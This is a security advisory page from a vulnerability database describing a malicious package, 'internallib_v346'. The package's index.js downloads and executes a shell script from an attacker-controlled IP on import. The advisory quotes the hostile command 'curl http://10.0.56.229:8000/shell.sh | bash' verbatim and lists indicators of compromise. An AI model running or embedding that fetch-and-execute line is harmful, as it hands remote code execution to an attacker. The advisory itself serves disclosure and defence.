VDB

GCVE-110-OSM-2026-5271

GCVE-110-OSM-2026-5271
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 3, 2026
The package contains a literal `curl http://10.0.56.229:8000/shell.sh | bash` command executed via `child_process.exec` in index.js. The console.log message ('Baixando e executando o shell da minha maquina...') translates from Portuguese as 'Downloading and executing the shell from my machine,' confirming deliberate intent. The attacker model is a remote shell loader: on import the package fetches and executes an arbitrary shell script from an attacker-controlled internal IP. The package was created and iterated rapidly (5 versions in ~2 hours) by a brand-new single-package publisher with no metadata, consistent with iterative payload testing before broader distribution. Entrypoint: index.js (main: index.js) Payload: index.js Key findings: - Curl/Wget Pipe to Shell in index.js: "curl http://10.0.56.229:8000/shell.sh | bash" - Shell Command Execution in index.js: "require('child_process')" - Brand New Package - Rapid Version Publishing IOCs: - urls: http://0.0.0.0:4873/, http://10.0.56.229:8000/shell.sh - domains: shell.sh - payloadFileHash: 9adcf6f9d1df071c91dbc688f6ddc5f246567beab4fd2d2739c8d32d02e5d0d6

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowninternallib_v346all (affected), all (affected)

References

vendor

Browse GCVE Records

73,053 records in the GCVE database · Updated July 16, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›